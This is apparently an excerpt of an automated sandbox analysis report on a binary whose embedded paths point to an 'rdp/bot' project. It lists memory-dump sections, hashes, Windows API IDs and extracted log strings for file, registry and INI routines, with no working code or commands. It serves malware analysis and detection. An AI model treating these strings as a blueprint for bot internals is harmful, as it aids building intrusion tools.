    • Opcode Fuzzy Hash: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
    • Instruction Fuzzy Hash: 86C00226A185408BD6209B24E85535AA774E798308FD04111E65D92665CA3CD61ECF15
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: CriticalEnterSection
    • String ID:
    • API String ID: 1904992153-0
    • Opcode ID: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
    • Instruction ID: 240e7abc2dee4fc4e094993725ad4719956a87e90d520f847e82c152b5c12ae3
    • Opcode Fuzzy Hash: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
    • Instruction Fuzzy Hash: 03C04CD2F1960682FB18ABB5B89503512309F9C715F041037E9DE863B29E5C58D94A44
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
    • API String ID: 4253334766-1535167640
    • Opcode ID: 0c117dcf1b70b1ca6de5697b93cfccb7d8ae4961e298b13878a12c35d7c12fc5
    • Instruction ID: 7be3e1d8605963c6cd38b635c6e4a13ab8266dab1b6d574e195fcf31181c8c02
    • Opcode Fuzzy Hash: 0c117dcf1b70b1ca6de5697b93cfccb7d8ae4961e298b13878a12c35d7c12fc5
    • Instruction Fuzzy Hash: E5612A21E0CD47CEFA605A16A4403BD26516B303B4F5443F2D97EBBAF8DE6CA9C58349
    Memory Dump Source
    • Source File: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
    • Instruction ID: 43b69ae400987c27d8c58f9eff5c218fac3db41f9f8344595667033fe4b3fc8c
    • Opcode Fuzzy Hash: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
    • Instruction Fuzzy Hash: B7D05E83E9DAC25DF2670A354C211192E915BB2B24BCE81BAE66D4A3E3E85C58008219
    Memory Dump Source
    • Source File: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
    • Instruction ID: 93ea845258c5530004f56bfef98031e5e6cbe725bba2efe1d01392374ad0f494
    • Opcode Fuzzy Hash: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
    • Instruction Fuzzy Hash: 90D06783D5D7C54AE3239B309C2562A2F6427B2A11F4A81BFC2DA922B3E94C5404D221
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: _errno$fclosefflushfopenfseekfwrite
    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
    • API String ID: 2897271634-4120527733
    • Opcode ID: c6ab880d62e322add5670c6688a1b4e102cf9b000f052bf6b1aa43f27ab01892
    • Instruction ID: dd327043883d80df7fcfd38dd54f957c4c500a7997cc11f1c11e15f1b4cffb87
    • Opcode Fuzzy Hash: c6ab880d62e322add5670c6688a1b4e102cf9b000f052bf6b1aa43f27ab01892
    • Instruction Fuzzy Hash: 36D15061A09E078DEA109B17E84077C2752AF707B4F4442F2DA2E77AB5DE7CE985D308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
    • API String ID: 2460052984-4087913290
    • Opcode ID: 8c95aa0a120bfe0af3acf2de9201306ac75f388cf0a95f5f789a8ee04980cbda
    • Instruction ID: a872602822b9a23838f1bf3de3fdc85fde0f9032a902a4df589dfe0408bc00b8
    • Opcode Fuzzy Hash: 8c95aa0a120bfe0af3acf2de9201306ac75f388cf0a95f5f789a8ee04980cbda
    • Instruction Fuzzy Hash: 9CA1D161A0CE838DFA209B17A4403FD6352AFA0374F5442F2D66E76AB5DE3CE485D709
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CloseOpenValuefflushfwrite
    • String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
    • API String ID: 716145365-86941537
    • Opcode ID: 97fac1c429d324d771e78f96010b11915e5e200a702dc340887177889cfd6832
    • Instruction ID: 6dcdd5ab62ddb6bc5a2640ac60bbb6432dba2cbfa23cd1c0192561b64c263a96
    • Opcode Fuzzy Hash: 97fac1c429d324d771e78f96010b11915e5e200a702dc340887177889cfd6832
    • Instruction Fuzzy Hash: 9A81416190DF4B8DFA209746A44427D7260AF20764F0402F2D97E66FB5EE5DE9C6C309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CloseDeleteOpenValuefflushfwrite
    • String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
    • API String ID: 3240087161-1026589300
    • Opcode ID: 0df8e2a64b31df24b98beab896623ea6af86e3c5906b977220fd0020807af6b5
    • Instruction ID: 9dbeec737aef85331ad3adcfb7a4115c1f5ef6d77139a25f74e9619fd93f5c89
    • Opcode Fuzzy Hash: 0df8e2a64b31df24b98beab896623ea6af86e3c5906b977220fd0020807af6b5
    • Instruction Fuzzy Hash: A381425090CF4B8DFA70A746A84027C6251AF21764F5402F2D97E76EB1EE1EA9D6830A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strlen$CreateDirectoryErrorLast$strcpy
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
    • API String ID: 1104438493-1059260517
    • Opcode ID: 13e1409b821552f30bb7bfb1d4cec5f2c8d46ac37056f7234dd1eb152be83d86
    • Instruction ID: 4313c623721496b42acf049d96df64f8db6b6a3e53f939429454d0f2fe62f8de
    • Opcode Fuzzy Hash: 13e1409b821552f30bb7bfb1d4cec5f2c8d46ac37056f7234dd1eb152be83d86
    • Instruction Fuzzy Hash: 3571A011E0CE47CDFA604B17E4403BD1261AB74764F5402F2C96E77AF9DE2CA8C98709
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CloseEnumOpen
    • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
    • API String ID: 1332880857-2775769510
    • Opcode ID: 72b2d43fdba270805fa9ce16a4e38d3f9eee1f7342bd0eed841d7fb7506766b3
    • Instruction ID: eedeb16c940bef076215d32d4ec7f4294340d23eb6c01f560710e0fd7d64dbf0
    • Opcode Fuzzy Hash: 72b2d43fdba270805fa9ce16a4e38d3f9eee1f7342bd0eed841d7fb7506766b3
    • Instruction Fuzzy Hash: C7B16D6290CD46CEF6608B46E44037C2252ABA4374F5603F2D96E67EB4CE3DE9C68709
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: AttributesErrorFileLast
    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
    • API String ID: 1799206407-3397184676
    • Opcode ID: 5cb7c68916377c18952a3f6c392acdb44dab1268577e48e40afc6e5c61ff4aeb
    • Instruction ID: 4513d1a61626a37855d7a48f0ffa283132f1231eb63022a970fb4ec8502aa44c
    • Opcode Fuzzy Hash: 5cb7c68916377c18952a3f6c392acdb44dab1268577e48e40afc6e5c61ff4aeb
    • Instruction Fuzzy Hash: EE51D961D0CE17CDFA205B07A4403BC22516B317B5F5403F6C93F669F9AEADA6C58309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
    • API String ID: 1423203057-2746879330
    • Opcode ID: 76fbbf14fbc657a8e3d58a840b4199e37f4541f4b95c2e21979a01deef1518ed
    • Instruction ID: 89ec0c7ff581412f52a1aec3aec5dd6b71231fe0d6ee09aa02256abe8611dfe2
    • Opcode Fuzzy Hash: 76fbbf14fbc657a8e3d58a840b4199e37f4541f4b95c2e21979a01deef1518ed
    • Instruction Fuzzy Hash: 3FA11562E0DE8289EB108B07E4407BD6761EB607A4F4842F1DD6D67BA5DE7CE5C5C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
    • API String ID: 1721699506-2819899730
    • Opcode ID: 8ab0d63a7ad09023c8dadfca32a360aa26305965fbad4a44faec58763f4efc0f
    • Instruction ID: cd99a7b5d0b9ba31bbcdd5da4256e0e30ceb1329cbb5b3f0091f4ea4939fea79
    • Opcode Fuzzy Hash: 8ab0d63a7ad09023c8dadfca32a360aa26305965fbad4a44faec58763f4efc0f
    • Instruction Fuzzy Hash: 1A615162A0CD07CDFA608B46F8403BC26526B60374F5542F6C52E6BAB5DF7DE986830D
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
    • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
    • API String ID: 2123903355-2019010457
    • Opcode ID: 1629f6cdff152c952fef223b62ae5ce28c209337de3446359f48edf2346dde2c
    • Instruction ID: 7d3f79fed07386381d261911b8f994fd0426892276d77c02fa5cdf0d692e2a62
    • Opcode Fuzzy Hash: 1629f6cdff152c952fef223b62ae5ce28c209337de3446359f48edf2346dde2c
    • Instruction Fuzzy Hash: 71413575A09A42CEE750DF26E44056977E1FB68764F400279DA6DB3BB4EB3CE844CB04
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strlen
    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
    • API String ID: 39653677-3302659514
    • Opcode ID: a340db96f21713e2e7cd9b7b340a61d268bd620e4dd1548086a42e5f2b03385c
    • Instruction ID: bef8141fce0361da9ae93dd2a1e304e603de394f3a9c35631046c5369dab77e5
    • Opcode Fuzzy Hash: a340db96f21713e2e7cd9b7b340a61d268bd620e4dd1548086a42e5f2b03385c
    • Instruction Fuzzy Hash: 0D4160A1D0CE479DFA119B13A8003BC1752AF647B4F4446F2C57E2BAB5DF7DA9868308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Heap$Processstrlen$AllocFree
    • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
    • API String ID: 1318626975-3964590784
    • Opcode ID: cf1b99c35f276a5e0c651773de3d5a766dbe0ef933e7924d8d0a11dcf365ad75
    • Instruction ID: 7686a694d19eea8e207303f6ada474ae0e454110e99be823c876717345e120fc
    • Opcode Fuzzy Hash: cf1b99c35f276a5e0c651773de3d5a766dbe0ef933e7924d8d0a11dcf365ad75
    • Instruction Fuzzy Hash: F4318161E08E438DF6509B1394003AC6261AF60BA4F4443F1D96E67BB6DF3CE985C348
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: AttributesFile$ErrorLast
    • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
    • API String ID: 365566950-3085771803
    • Opcode ID: 7514cd20b27e907929f1a418a85780667d7c45201f85419700cd80c35fa270af
